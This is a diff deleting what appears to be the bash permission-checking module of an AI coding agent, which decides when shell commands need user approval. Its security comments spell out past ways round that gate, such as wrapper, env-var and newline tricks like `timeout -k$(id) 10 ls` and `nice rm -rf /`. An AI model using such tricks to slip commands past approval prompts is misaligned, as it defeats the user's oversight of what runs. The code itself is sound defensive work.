  1969. package/dist/src/utils/ultraplan/ccrSession.js +0 -264
  1970. package/dist/src/utils/ultraplan/keyword.js +0 -122
  1971. package/dist/src/utils/ultraplan/prompt.txt +0 -1
  1972. package/dist/src/utils/unaryLogging.js +0 -16
  1973. package/dist/src/utils/undercover.js +0 -89
  1974. package/dist/src/utils/user.js +0 -138
  1975. package/dist/src/utils/userAgent.js +0 -13
  1976. package/dist/src/utils/userPromptKeywords.js +0 -21
  1977. package/dist/src/utils/uuid.js +0 -22
  1978. package/dist/src/utils/warningHandler.js +0 -97
  1979. package/dist/src/utils/which.js +0 -75
  1980. package/dist/src/utils/windowsPaths.js +0 -146
  1981. package/dist/src/utils/withResolvers.js +0 -13
  1982. package/dist/src/utils/words.js +0 -793
  1983. package/dist/src/utils/workloadContext.js +0 -42
  1984. package/dist/src/utils/worktree.js +0 -1142
  1985. package/dist/src/utils/worktreeModeEnabled.js +0 -11
  1986. package/dist/src/utils/xdg.js +0 -52
  1987. package/dist/src/utils/xml.js +0 -15
  1988. package/dist/src/utils/yaml.js +0 -16
  1989. package/dist/src/utils/zodToJsonSchema.js +0 -19
  1990. package/dist/src/vim/motions.js +0 -73
  1991. package/dist/src/vim/operators.js +0 -401
  1992. package/dist/src/vim/textObjects.js +0 -153
  1993. package/dist/src/vim/transitions.js +0 -340
  1994. package/dist/src/vim/types.js +0 -93
  1995. package/dist/src/voice/voiceModeEnabled.js +0 -48
  1996. package/dist/src/whatsapp/bridge.js +0 -267
  1997. package/dist/src/whatsapp/config.js +0 -128
  1998. package/dist/src/whatsapp/markdown.js +0 -37
  1999. package/dist/src/whatsapp/mirror.js +0 -74
  2000. package/dist/src/whatsapp/session.js +0 -142
@@ -1,2023 +0,0 @@
1
- import { feature } from '../../recovery/bunBundleShim.js';
2
- import { APIUserAbortError } from '@anthropic-ai/sdk';
3
- import { getFeatureValue_CACHED_MAY_BE_STALE } from '../../services/analytics/growthbook.js';
4
- import { logEvent, } from '../../services/analytics/index.js';
5
- import { count } from '../../utils/array.js';
6
- import { checkSemantics, nodeTypeId, parseForSecurityFromAst, } from '../../utils/bash/ast.js';
7
- import { extractOutputRedirections, getCommandSubcommandPrefix, splitCommand_DEPRECATED, } from '../../utils/bash/commands.js';
8
- import { parseCommandRaw } from '../../utils/bash/parser.js';
9
- import { tryParseShellCommand } from '../../utils/bash/shellQuote.js';
10
- import { getCwd } from '../../utils/cwd.js';
11
- import { logForDebugging } from '../../utils/debug.js';
12
- import { isEnvTruthy } from '../../utils/envUtils.js';
13
- import { AbortError } from '../../utils/errors.js';
14
- import { classifyBashCommand, getBashPromptAllowDescriptions, getBashPromptAskDescriptions, getBashPromptDenyDescriptions, isClassifierPermissionsEnabled, } from '../../utils/permissions/bashClassifier.js';
15
- import { extractRules } from '../../utils/permissions/PermissionUpdate.js';
16
- import { permissionRuleValueToString } from '../../utils/permissions/permissionRuleParser.js';
17
- import { createPermissionRequestMessage, getRuleByContentsForTool, } from '../../utils/permissions/permissions.js';
18
- import { parsePermissionRule, matchWildcardPattern as sharedMatchWildcardPattern, permissionRuleExtractPrefix as sharedPermissionRuleExtractPrefix, suggestionForExactCommand as sharedSuggestionForExactCommand, suggestionForPrefix as sharedSuggestionForPrefix, } from '../../utils/permissions/shellRuleMatching.js';
19
- import { getPlatform } from '../../utils/platform.js';
20
- import { SandboxManager } from '../../utils/sandbox/sandbox-adapter.js';
21
- import { jsonStringify } from '../../utils/slowOperations.js';
22
- import { windowsPathToPosixPath } from '../../utils/windowsPaths.js';
23
- import { BashTool } from './BashTool.js';
24
- import { checkCommandOperatorPermissions } from './bashCommandHelpers.js';
25
- import { bashCommandIsSafeAsync_DEPRECATED, stripSafeHeredocSubstitutions, } from './bashSecurity.js';
26
- import { checkPermissionMode } from './modeValidation.js';
27
- import { checkPathConstraints } from './pathValidation.js';
28
- import { checkSedConstraints } from './sedValidation.js';
29
- import { shouldUseSandbox } from './shouldUseSandbox.js';
30
- // DCE cliff: Bun's feature() evaluator has a per-function complexity budget.
31
- // bashToolHasPermission is right at the limit. `import { X as Y }` aliases
32
- // inside the import block count toward this budget; when they push it over
33
- // the threshold Bun can no longer prove feature('BASH_CLASSIFIER') is a
34
- // constant and silently evaluates the ternaries to `false`, dropping every
35
- // pendingClassifierCheck spread. Keep aliases as top-level const rebindings
36
- // instead. (See also the comment on checkSemanticsDeny below.)
37
- const bashCommandIsSafeAsync = bashCommandIsSafeAsync_DEPRECATED;
38
- const splitCommand = splitCommand_DEPRECATED;
39
- // Env-var assignment prefix (VAR=value). Shared across three while-loops that
40
- // skip safe env vars before extracting the command name.
41
- const ENV_VAR_ASSIGN_RE = /^[A-Za-z_]\w*=/;
42
- // CC-643: On complex compound commands, splitCommand_DEPRECATED can produce a
43
- // very large subcommands array (possible exponential growth; #21405's ReDoS fix
44
- // may have been incomplete). Each subcommand then runs tree-sitter parse +
45
- // ~20 validators + logEvent (bashSecurity.ts), and with memoized metadata the
46
- // resulting microtask chain starves the event loop — REPL freeze at 100% CPU,
47
- // strace showed /proc/self/stat reads at ~127Hz with no epoll_wait. Fifty is
48
- // generous: legitimate user commands don't split that wide. Above the cap we
49
- // fall back to 'ask' (safe default — we can't prove safety, so we prompt).
50
- export const MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50;
51
- // GH#11380: Cap the number of per-subcommand rules suggested for compound
52
- // commands. Beyond this, the "Yes, and don't ask again for X, Y, Z…" label
53
- // degrades to "similar commands" anyway, and saving 10+ rules from one prompt
54
- // is more likely noise than intent. Users chaining this many write commands
55
- // in one && list are rare; they can always approve once and add rules manually.
56
- export const MAX_SUGGESTED_RULES_FOR_COMPOUND = 5;
57
- /**
58
- * [ANT-ONLY] Log classifier evaluation results for analysis.
59
- * This helps us understand which classifier rules are being evaluated
60
- * and how the classifier is deciding on commands.
61
- */
62
- function logClassifierResultForAnts(command, behavior, descriptions, result) {
63
- if (process.env.USER_TYPE !== 'ant') {
64
- return;
65
- }
66
- logEvent('tengu_internal_bash_classifier_result', {
67
- behavior: behavior,
68
- descriptions: jsonStringify(descriptions),
69
- matches: result.matches,
70
- matchedDescription: (result.matchedDescription ??
71
- ''),
72
- confidence: result.confidence,
73
- reason: result.reason,
74
- // Note: command contains code/filepaths - this is ANT-ONLY so it's OK
75
- command: command,
76
- });
77
- }
78
- /**
79
- * Extract a stable command prefix (command + subcommand) from a raw command string.
80
- * Skips leading env var assignments only if they are in SAFE_ENV_VARS (or
81
- * ANT_ONLY_SAFE_ENV_VARS for ant users). Returns null if a non-safe env var is
82
- * encountered (to fall back to exact match), or if the second token doesn't look
83
- * like a subcommand (lowercase alphanumeric, e.g., "commit", "run").
84
- *
85
- * Examples:
86
- * 'git commit -m "fix typo"' → 'git commit'
87
- * 'NODE_ENV=prod npm run build' → 'npm run' (NODE_ENV is safe)
88
- * 'MY_VAR=val npm run build' → null (MY_VAR is not safe)
89
- * 'ls -la' → null (flag, not a subcommand)
90
- * 'cat file.txt' → null (filename, not a subcommand)
91
- * 'chmod 755 file' → null (number, not a subcommand)
92
- */
93
- export function getSimpleCommandPrefix(command) {
94
- const tokens = command.trim().split(/\s+/).filter(Boolean);
95
- if (tokens.length === 0)
96
- return null;
97
- // Skip env var assignments (VAR=value) at the start, but only if they are
98
- // in SAFE_ENV_VARS (or ANT_ONLY_SAFE_ENV_VARS for ant users). If a non-safe
99
- // env var is encountered, return null to fall back to exact match. This
100
- // prevents generating prefix rules like Bash(npm run:*) that can never match
101
- // at allow-rule check time, because stripSafeWrappers only strips safe vars.
102
- let i = 0;
103
- while (i < tokens.length && ENV_VAR_ASSIGN_RE.test(tokens[i])) {
104
- const varName = tokens[i].split('=')[0];
105
- const isAntOnlySafe = process.env.USER_TYPE === 'ant' && ANT_ONLY_SAFE_ENV_VARS.has(varName);
106
- if (!SAFE_ENV_VARS.has(varName) && !isAntOnlySafe) {
107
- return null;
108
- }
109
- i++;
110
- }
111
- const remaining = tokens.slice(i);
112
- if (remaining.length < 2)
113
- return null;
114
- const subcmd = remaining[1];
115
- // Second token must look like a subcommand (e.g., "commit", "run", "compose"),
116
- // not a flag (-rf), filename (file.txt), path (/tmp), URL, or number (755).
117
- if (!/^[a-z][a-z0-9]*(-[a-z0-9]+)*$/.test(subcmd))
118
- return null;
119
- return remaining.slice(0, 2).join(' ');
120
- }
121
- // Bare-prefix suggestions like `bash:*` or `sh:*` would allow arbitrary code
122
- // via `-c`. Wrapper suggestions like `env:*` or `sudo:*` would do the same:
123
- // `env` is NOT in SAFE_WRAPPER_PATTERNS, so `env bash -c "evil"` survives
124
- // stripSafeWrappers unchanged and hits the startsWith("env ") check at
125
- // the prefix-rule matcher. Shell list mirrors DANGEROUS_SHELL_PREFIXES in
126
- // src/utils/shell/prefix.ts which guarded the old Haiku extractor.
127
- const BARE_SHELL_PREFIXES = new Set([
128
- 'sh',
129
- 'bash',
130
- 'zsh',
131
- 'fish',
132
- 'csh',
133
- 'tcsh',
134
- 'ksh',
135
- 'dash',
136
- 'cmd',
137
- 'powershell',
138
- 'pwsh',
139
- // wrappers that exec their args as a command
140
- 'env',
141
- 'xargs',
142
- // SECURITY: checkSemantics (ast.ts) strips these wrappers to check the
143
- // wrapped command. Suggesting `Bash(nice:*)` would be ≈ `Bash(*)` — users
144
- // would add it after a prompt, then `nice rm -rf /` passes semantics while
145
- // deny/cd+git gates see 'nice' (SAFE_WRAPPER_PATTERNS below didn't strip
146
- // bare `nice` until this fix). Block these from ever being suggested.
147
- 'nice',
148
- 'stdbuf',
149
- 'nohup',
150
- 'timeout',
151
- 'time',
152
- // privilege escalation — sudo:* from `sudo -u foo ...` would auto-approve
153
- // any future sudo invocation
154
- 'sudo',
155
- 'doas',
156
- 'pkexec',
157
- ]);
158
- /**
159
- * UI-only fallback: extract the first word alone when getSimpleCommandPrefix
160
- * declines. In external builds TREE_SITTER_BASH is off, so the async
161
- * tree-sitter refinement in BashPermissionRequest never fires — without this,
162
- * pipes and compounds (`python3 file.py 2>&1 | tail -20`) dump into the
163
- * editable field verbatim.
164
- *
165
- * Deliberately not used by suggestionForExactCommand: a backend-suggested
166
- * `Bash(rm:*)` is too broad to auto-generate, but as an editable starting
167
- * point it's what users expect (Slack C07VBSHV7EV/p1772670433193449).
168
- *
169
- * Reuses the same SAFE_ENV_VARS gate as getSimpleCommandPrefix — a rule like
170
- * `Bash(python3:*)` can never match `RUN=/path python3 ...` at check time
171
- * because stripSafeWrappers won't strip RUN.
172
- */
173
- export function getFirstWordPrefix(command) {
174
- const tokens = command.trim().split(/\s+/).filter(Boolean);
175
- let i = 0;
176
- while (i < tokens.length && ENV_VAR_ASSIGN_RE.test(tokens[i])) {
177
- const varName = tokens[i].split('=')[0];
178
- const isAntOnlySafe = process.env.USER_TYPE === 'ant' && ANT_ONLY_SAFE_ENV_VARS.has(varName);
179
- if (!SAFE_ENV_VARS.has(varName) && !isAntOnlySafe) {
180
- return null;
181
- }
182
- i++;
183
- }
184
- const cmd = tokens[i];
185
- if (!cmd)
186
- return null;
187
- // Same shape check as the subcommand regex in getSimpleCommandPrefix:
188
- // rejects paths (./script.sh, /usr/bin/python), flags, numbers, filenames.
189
- if (!/^[a-z][a-z0-9]*(-[a-z0-9]+)*$/.test(cmd))
190
- return null;
191
- if (BARE_SHELL_PREFIXES.has(cmd))
192
- return null;
193
- return cmd;
194
- }
195
- function suggestionForExactCommand(command) {
196
- // Heredoc commands contain multi-line content that changes each invocation,
197
- // making exact-match rules useless (they'll never match again). Extract a
198
- // stable prefix before the heredoc operator and suggest a prefix rule instead.
199
- const heredocPrefix = extractPrefixBeforeHeredoc(command);
200
- if (heredocPrefix) {
201
- return sharedSuggestionForPrefix(BashTool.name, heredocPrefix);
202
- }
203
- // Multiline commands without heredoc also make poor exact-match rules.
204
- // Saving the full multiline text can produce patterns containing `:*` in
205
- // the middle, which fails permission validation and corrupts the settings
206
- // file. Use the first line as a prefix rule instead.
207
- if (command.includes('\n')) {
208
- const firstLine = command.split('\n')[0].trim();
209
- if (firstLine) {
210
- return sharedSuggestionForPrefix(BashTool.name, firstLine);
211
- }
212
- }
213
- // Single-line commands: extract a 2-word prefix for reusable rules.
214
- // Without this, exact-match rules are saved that never match future
215
- // invocations with different arguments.
216
- const prefix = getSimpleCommandPrefix(command);
217
- if (prefix) {
218
- return sharedSuggestionForPrefix(BashTool.name, prefix);
219
- }
220
- return sharedSuggestionForExactCommand(BashTool.name, command);
221
- }
222
- /**
223
- * If the command contains a heredoc (<<), extract the command prefix before it.
224
- * Returns the first word(s) before the heredoc operator as a stable prefix,
225
- * or null if the command doesn't contain a heredoc.
226
- *
227
- * Examples:
228
- * 'git commit -m "$(cat <<\'EOF\'\n...\nEOF\n)"' → 'git commit'
229
- * 'cat <<EOF\nhello\nEOF' → 'cat'
230
- * 'echo hello' → null (no heredoc)
231
- */
232
- function extractPrefixBeforeHeredoc(command) {
233
- if (!command.includes('<<'))
234
- return null;
235
- const idx = command.indexOf('<<');
236
- if (idx <= 0)
237
- return null;
238
- const before = command.substring(0, idx).trim();
239
- if (!before)
240
- return null;
241
- const prefix = getSimpleCommandPrefix(before);
242
- if (prefix)
243
- return prefix;
244
- // Fallback: skip safe env var assignments and take up to 2 tokens.
245
- // This preserves flag tokens (e.g., "python3 -c" stays "python3 -c",
246
- // not just "python3") and skips safe env var prefixes like "NODE_ENV=test".
247
- // If a non-safe env var is encountered, return null to avoid generating
248
- // prefix rules that can never match (same rationale as getSimpleCommandPrefix).
249
- const tokens = before.split(/\s+/).filter(Boolean);
250
- let i = 0;
251
- while (i < tokens.length && ENV_VAR_ASSIGN_RE.test(tokens[i])) {
252
- const varName = tokens[i].split('=')[0];
253
- const isAntOnlySafe = process.env.USER_TYPE === 'ant' && ANT_ONLY_SAFE_ENV_VARS.has(varName);
254
- if (!SAFE_ENV_VARS.has(varName) && !isAntOnlySafe) {
255
- return null;
256
- }
257
- i++;
258
- }
259
- if (i >= tokens.length)
260
- return null;
261
- return tokens.slice(i, i + 2).join(' ') || null;
262
- }
263
- function suggestionForPrefix(prefix) {
264
- return sharedSuggestionForPrefix(BashTool.name, prefix);
265
- }
266
- /**
267
- * Extract prefix from legacy :* syntax (e.g., "npm:*" -> "npm")
268
- * Delegates to shared implementation.
269
- */
270
- export const permissionRuleExtractPrefix = sharedPermissionRuleExtractPrefix;
271
- /**
272
- * Match a command against a wildcard pattern (case-sensitive for Bash).
273
- * Delegates to shared implementation.
274
- */
275
- export function matchWildcardPattern(pattern, command) {
276
- return sharedMatchWildcardPattern(pattern, command);
277
- }
278
- /**
279
- * Parse a permission rule into a structured rule object.
280
- * Delegates to shared implementation.
281
- */
282
- export const bashPermissionRule = parsePermissionRule;
283
- /**
284
- * Whitelist of environment variables that are safe to strip from commands.
285
- * These variables CANNOT execute code or load libraries.
286
- *
287
- * SECURITY: These must NEVER be added to the whitelist:
288
- * - PATH, LD_PRELOAD, LD_LIBRARY_PATH, DYLD_* (execution/library loading)
289
- * - PYTHONPATH, NODE_PATH, CLASSPATH, RUBYLIB (module loading)
290
- * - GOFLAGS, RUSTFLAGS, NODE_OPTIONS (can contain code execution flags)
291
- * - HOME, TMPDIR, SHELL, BASH_ENV (affect system behavior)
292
- */
293
- const SAFE_ENV_VARS = new Set([
294
- // Go - build/runtime settings only
295
- 'GOEXPERIMENT', // experimental features
296
- 'GOOS', // target OS
297
- 'GOARCH', // target architecture
298
- 'CGO_ENABLED', // enable/disable CGO
299
- 'GO111MODULE', // module mode
300
- // Rust - logging/debugging only
301
- 'RUST_BACKTRACE', // backtrace verbosity
302
- 'RUST_LOG', // logging filter
303
- // Node - environment name only (not NODE_OPTIONS!)
304
- 'NODE_ENV',
305
- // Python - behavior flags only (not PYTHONPATH!)
306
- 'PYTHONUNBUFFERED', // disable buffering
307
- 'PYTHONDONTWRITEBYTECODE', // no .pyc files
308
- // Pytest - test configuration
309
- 'PYTEST_DISABLE_PLUGIN_AUTOLOAD', // disable plugin loading
310
- 'PYTEST_DEBUG', // debug output
311
- // API keys and authentication
312
- 'ANTHROPIC_API_KEY', // API authentication
313
- // Locale and character encoding
314
- 'LANG', // default locale
315
- 'LANGUAGE', // language preference list
316
- 'LC_ALL', // override all locale settings
317
- 'LC_CTYPE', // character classification
318
- 'LC_TIME', // time format
319
- 'CHARSET', // character set preference
320
- // Terminal and display
321
- 'TERM', // terminal type
322
- 'COLORTERM', // color terminal indicator
323
- 'NO_COLOR', // disable color output (universal standard)
324
- 'FORCE_COLOR', // force color output
325
- 'TZ', // timezone
326
- // Color configuration for various tools
327
- 'LS_COLORS', // colors for ls (GNU)
328
- 'LSCOLORS', // colors for ls (BSD/macOS)
329
- 'GREP_COLOR', // grep match color (deprecated)
330
- 'GREP_COLORS', // grep color scheme
331
- 'GCC_COLORS', // GCC diagnostic colors
332
- // Display formatting
333
- 'TIME_STYLE', // time display format for ls
334
- 'BLOCK_SIZE', // block size for du/df
335
- 'BLOCKSIZE', // alternative block size
336
- ]);
337
- /**
338
- * ANT-ONLY environment variables that are safe to strip from commands.
339
- * These are only enabled when USER_TYPE === 'ant'.
340
- *
341
- * SECURITY: These env vars are stripped before permission-rule matching, which
342
- * means `DOCKER_HOST=tcp://evil.com docker ps` matches a `Bash(docker ps:*)`
343
- * rule after stripping. This is INTENTIONALLY ANT-ONLY (gated at line ~380)
344
- * and MUST NEVER ship to external users. DOCKER_HOST redirects the Docker
345
- * daemon endpoint — stripping it defeats prefix-based permission restrictions
346
- * by hiding the network endpoint from the permission check. KUBECONFIG
347
- * similarly controls which cluster kubectl talks to. These are convenience
348
- * strippings for internal power users who accept the risk.
349
- *
350
- * Based on analysis of 30 days of tengu_internal_bash_tool_use_permission_request events.
351
- */
352
- const ANT_ONLY_SAFE_ENV_VARS = new Set([
353
- // Kubernetes and container config (config file pointers, not execution)
354
- 'KUBECONFIG', // kubectl config file path — controls which cluster kubectl uses
355
- 'DOCKER_HOST', // Docker daemon socket/endpoint — controls which daemon docker talks to
356
- // Cloud provider project/profile selection (just names/identifiers)
357
- 'AWS_PROFILE', // AWS profile name selection
358
- 'CLOUDSDK_CORE_PROJECT', // GCP project ID
359
- 'CLUSTER', // generic cluster name
360
- // Anthropic internal cluster selection (just names/identifiers)
361
- 'COO_CLUSTER', // coo cluster name
362
- 'COO_CLUSTER_NAME', // coo cluster name (alternate)
363
- 'COO_NAMESPACE', // coo namespace
364
- 'COO_LAUNCH_YAML_DRY_RUN', // dry run mode
365
- // Feature flags (boolean/string flags only)
366
- 'SKIP_NODE_VERSION_CHECK', // skip version check
367
- 'EXPECTTEST_ACCEPT', // accept test expectations
368
- 'CI', // CI environment indicator
369
- 'GIT_LFS_SKIP_SMUDGE', // skip LFS downloads
370
- // GPU/Device selection (just device IDs)
371
- 'CUDA_VISIBLE_DEVICES', // GPU device selection
372
- 'JAX_PLATFORMS', // JAX platform selection
373
- // Display/terminal settings
374
- 'COLUMNS', // terminal width
375
- 'TMUX', // TMUX socket info
376
- // Test/debug configuration
377
- 'POSTGRESQL_VERSION', // postgres version string
378
- 'FIRESTORE_EMULATOR_HOST', // emulator host:port
379
- 'HARNESS_QUIET', // quiet mode flag
380
- 'TEST_CROSSCHECK_LISTS_MATCH_UPDATE', // test update flag
381
- 'DBT_PER_DEVELOPER_ENVIRONMENTS', // DBT config
382
- 'STATSIG_FORD_DB_CHECKS', // statsig DB check flag
383
- // Build configuration
384
- 'ANT_ENVIRONMENT', // Anthropic environment name
385
- 'ANT_SERVICE', // Anthropic service name
386
- 'MONOREPO_ROOT_DIR', // monorepo root path
387
- // Version selectors
388
- 'PYENV_VERSION', // Python version selection
389
- // Credentials (approved subset - these don't change exfil risk)
390
- 'PGPASSWORD', // Postgres password
391
- 'GH_TOKEN', // GitHub token
392
- 'GROWTHBOOK_API_KEY', // self-hosted growthbook
393
- ]);
394
- /**
395
- * Strips full-line comments from a command.
396
- * This handles cases where Claude adds comments in bash commands, e.g.:
397
- * "# Check the logs directory\nls /home/user/logs"
398
- * Should be stripped to: "ls /home/user/logs"
399
- *
400
- * Only strips full-line comments (lines where the entire line is a comment),
401
- * not inline comments that appear after a command on the same line.
402
- */
403
- function stripCommentLines(command) {
404
- const lines = command.split('\n');
405
- const nonCommentLines = lines.filter(line => {
406
- const trimmed = line.trim();
407
- // Keep lines that are not empty and don't start with #
408
- return trimmed !== '' && !trimmed.startsWith('#');
409
- });
410
- // If all lines were comments/empty, return original
411
- if (nonCommentLines.length === 0) {
412
- return command;
413
- }
414
- return nonCommentLines.join('\n');
415
- }
416
- export function stripSafeWrappers(command) {
417
- // SECURITY: Use [ \t]+ not \s+ — \s matches \n/\r which are command
418
- // separators in bash. Matching across a newline would strip the wrapper from
419
- // one line and leave a different command on the next line for bash to execute.
420
- //
421
- // SECURITY: `(?:--[ \t]+)?` consumes the wrapper's own `--` so
422
- // `nohup -- rm -- -/../foo` strips to `rm -- -/../foo` (not `-- rm ...`
423
- // which would skip path validation with `--` as an unknown baseCmd).
424
- const SAFE_WRAPPER_PATTERNS = [
425
- // timeout: enumerate GNU long flags — no-value (--foreground,
426
- // --preserve-status, --verbose), value-taking in both =fused and
427
- // space-separated forms (--kill-after=5, --kill-after 5, --signal=TERM,
428
- // --signal TERM). Short: -v (no-arg), -k/-s with separate or fused value.
429
- // SECURITY: flag VALUES use allowlist [A-Za-z0-9_.+-] (signals are
430
- // TERM/KILL/9, durations are 5/5s/10.5). Previously [^ \t]+ matched
431
- // $ ( ) ` | ; & — `timeout -k$(id) 10 ls` stripped to `ls`, matched
432
- // Bash(ls:*), while bash expanded $(id) during word splitting BEFORE
433
- // timeout ran. Contrast ENV_VAR_PATTERN below which already allowlists.
434
- /^timeout[ \t]+(?:(?:--(?:foreground|preserve-status|verbose)|--(?:kill-after|signal)=[A-Za-z0-9_.+-]+|--(?:kill-after|signal)[ \t]+[A-Za-z0-9_.+-]+|-v|-[ks][ \t]+[A-Za-z0-9_.+-]+|-[ks][A-Za-z0-9_.+-]+)[ \t]+)*(?:--[ \t]+)?\d+(?:\.\d+)?[smhd]?[ \t]+/,
435
- /^time[ \t]+(?:--[ \t]+)?/,
436
- // SECURITY: keep in sync with checkSemantics wrapper-strip (ast.ts
437
- // ~:1990-2080) AND stripWrappersFromArgv (pathValidation.ts ~:1260).
438
- // Previously this pattern REQUIRED `-n N`; checkSemantics already handled
439
- // bare `nice` and legacy `-N`. Asymmetry meant checkSemantics exposed the
440
- // wrapped command to semantic checks but deny-rule matching and the cd+git
441
- // gate saw the wrapper name. `nice rm -rf /` with Bash(rm:*) deny became
442
- // ask instead of deny; `cd evil && nice git status` skipped the bare-repo
443
- // RCE gate. PR #21503 fixed stripWrappersFromArgv; this was missed.
444
- // Now matches: `nice cmd`, `nice -n N cmd`, `nice -N cmd` (all forms
445
- // checkSemantics strips).
446
- /^nice(?:[ \t]+-n[ \t]+-?\d+|[ \t]+-\d+)?[ \t]+(?:--[ \t]+)?/,
447
- // stdbuf: fused short flags only (-o0, -eL). checkSemantics handles more
448
- // (space-separated, long --output=MODE), but we fail-closed on those
449
- // above so not over-stripping here is safe. Main need: `stdbuf -o0 cmd`.
450
- /^stdbuf(?:[ \t]+-[ioe][LN0-9]+)+[ \t]+(?:--[ \t]+)?/,
451
- /^nohup[ \t]+(?:--[ \t]+)?/,
452
- ];
453
- // Pattern for environment variables:
454
- // ^([A-Za-z_][A-Za-z0-9_]*) - Variable name (standard identifier)
455
- // = - Equals sign
456
- // ([A-Za-z0-9_./:-]+) - Value: alphanumeric + safe punctuation only
457
- // [ \t]+ - Required HORIZONTAL whitespace after value
458
- //
459
- // SECURITY: Only matches unquoted values with safe characters (no $(), `, $var, ;|&).
460
- //
461
- // SECURITY: Trailing whitespace MUST be [ \t]+ (horizontal only), NOT \s+.
462
- // \s matches \n/\r. If reconstructCommand emits an unquoted newline between
463
- // `TZ=UTC` and `echo`, \s+ would match across it and strip `TZ=UTC<NL>`,
464
- // leaving `echo curl evil.com` to match Bash(echo:*). But bash treats the
465
- // newline as a command separator. Defense-in-depth with needsQuoting fix.
466
- const ENV_VAR_PATTERN = /^([A-Za-z_][A-Za-z0-9_]*)=([A-Za-z0-9_./:-]+)[ \t]+/;
467
- let stripped = command;
468
- let previousStripped = '';
469
- // Phase 1: Strip leading env vars and comments only.
470
- // In bash, env var assignments before a command (VAR=val cmd) are genuine
471
- // shell-level assignments. These are safe to strip for permission matching.
472
- while (stripped !== previousStripped) {
473
- previousStripped = stripped;
474
- stripped = stripCommentLines(stripped);
475
- const envVarMatch = stripped.match(ENV_VAR_PATTERN);
476
- if (envVarMatch) {
477
- const varName = envVarMatch[1];
478
- const isAntOnlySafe = process.env.USER_TYPE === 'ant' && ANT_ONLY_SAFE_ENV_VARS.has(varName);
479
- if (SAFE_ENV_VARS.has(varName) || isAntOnlySafe) {
480
- stripped = stripped.replace(ENV_VAR_PATTERN, '');
481
- }
482
- }
483
- }
484
- // Phase 2: Strip wrapper commands and comments only. Do NOT strip env vars.
485
- // Wrapper commands (timeout, time, nice, nohup) use execvp to run their
486
- // arguments, so VAR=val after a wrapper is treated as the COMMAND to execute,
487
- // not as an env var assignment. Stripping env vars here would create a
488
- // mismatch between what the parser sees and what actually executes.
489
- // (HackerOne #3543050)
490
- previousStripped = '';
491
- while (stripped !== previousStripped) {
492
- previousStripped = stripped;
493
- stripped = stripCommentLines(stripped);
494
- for (const pattern of SAFE_WRAPPER_PATTERNS) {
495
- stripped = stripped.replace(pattern, '');
496
- }
497
- }
498
- return stripped.trim();
499
- }
500
- // SECURITY: allowlist for timeout flag VALUES (signals are TERM/KILL/9,
501
- // durations are 5/5s/10.5). Rejects $ ( ) ` | ; & and newlines that
502
- // previously matched via [^ \t]+ — `timeout -k$(id) 10 ls` must NOT strip.
503
- const TIMEOUT_FLAG_VALUE_RE = /^[A-Za-z0-9_.+-]+$/;
504
- /**
505
- * Parse timeout's GNU flags (long + short, fused + space-separated) and
506
- * return the argv index of the DURATION token, or -1 if flags are unparseable.
507
- * Enumerates: --foreground/--preserve-status/--verbose (no value),
508
- * --kill-after/--signal (value, both =fused and space-separated), -v (no
509
- * value), -k/-s (value, both fused and space-separated).
510
- *
511
- * Extracted from stripWrappersFromArgv to keep bashToolHasPermission under
512
- * Bun's feature() DCE complexity threshold — inlining this breaks
513
- * feature('BASH_CLASSIFIER') evaluation in classifier tests.
514
- */
515
- function skipTimeoutFlags(a) {
516
- let i = 1;
517
- while (i < a.length) {
518
- const arg = a[i];
519
- const next = a[i + 1];
520
- if (arg === '--foreground' ||
521
- arg === '--preserve-status' ||
522
- arg === '--verbose')
523
- i++;
524
- else if (/^--(?:kill-after|signal)=[A-Za-z0-9_.+-]+$/.test(arg))
525
- i++;
526
- else if ((arg === '--kill-after' || arg === '--signal') &&
527
- next &&
528
- TIMEOUT_FLAG_VALUE_RE.test(next))
529
- i += 2;
530
- else if (arg === '--') {
531
- i++;
532
- break;
533
- } // end-of-options marker
534
- else if (arg.startsWith('--'))
535
- return -1;
536
- else if (arg === '-v')
537
- i++;
538
- else if ((arg === '-k' || arg === '-s') &&
539
- next &&
540
- TIMEOUT_FLAG_VALUE_RE.test(next))
541
- i += 2;
542
- else if (/^-[ks][A-Za-z0-9_.+-]+$/.test(arg))
543
- i++;
544
- else if (arg.startsWith('-'))
545
- return -1;
546
- else
547
- break;
548
- }
549
- return i;
550
- }
551
- /**
552
- * Argv-level counterpart to stripSafeWrappers. Strips the same wrapper
553
- * commands (timeout, time, nice, nohup) from AST-derived argv. Env vars
554
- * are already separated into SimpleCommand.envVars so no env-var stripping.
555
- *
556
- * KEEP IN SYNC with SAFE_WRAPPER_PATTERNS above — if you add a wrapper
557
- * there, add it here too.
558
- */
559
- export function stripWrappersFromArgv(argv) {
560
- // SECURITY: Consume optional `--` after wrapper options, matching what the
561
- // wrapper does. Otherwise `['nohup','--','rm','--','-/../foo']` yields `--`
562
- // as baseCmd and skips path validation. See SAFE_WRAPPER_PATTERNS comment.
563
- let a = argv;
564
- for (;;) {
565
- if (a[0] === 'time' || a[0] === 'nohup') {
566
- a = a.slice(a[1] === '--' ? 2 : 1);
567
- }
568
- else if (a[0] === 'timeout') {
569
- const i = skipTimeoutFlags(a);
570
- if (i < 0 || !a[i] || !/^\d+(?:\.\d+)?[smhd]?$/.test(a[i]))
571
- return a;
572
- a = a.slice(i + 1);
573
- }
574
- else if (a[0] === 'nice' &&
575
- a[1] === '-n' &&
576
- a[2] &&
577
- /^-?\d+$/.test(a[2])) {
578
- a = a.slice(a[3] === '--' ? 4 : 3);
579
- }
580
- else {
581
- return a;
582
- }
583
- }
584
- }
585
- /**
586
- * Env vars that make a *different binary* run (injection or resolution hijack).
587
- * Heuristic only — export-&& form bypasses this, and excludedCommands isn't a
588
- * security boundary anyway.
589
- */
590
- export const BINARY_HIJACK_VARS = /^(LD_|DYLD_|PATH$)/;
591
- /**
592
- * Strip ALL leading env var prefixes from a command, regardless of whether the
593
- * var name is in the safe-list.
594
- *
595
- * Used for deny/ask rule matching: when a user denies `claude` or `rm`, the
596
- * command should stay blocked even if prefixed with arbitrary env vars like
597
- * `FOO=bar claude`. The safe-list restriction in stripSafeWrappers is correct
598
- * for allow rules (prevents `DOCKER_HOST=evil docker ps` from auto-matching
599
- * `Bash(docker ps:*)`), but deny rules must be harder to circumvent.
600
- *
601
- * Also used for sandbox.excludedCommands matching (not a security boundary —
602
- * permission prompts are), with BINARY_HIJACK_VARS as a blocklist.
603
- *
604
- * SECURITY: Uses a broader value pattern than stripSafeWrappers. The value
605
- * pattern excludes only actual shell injection characters ($, backtick, ;, |,
606
- * &, parens, redirects, quotes, backslash) and whitespace. Characters like
607
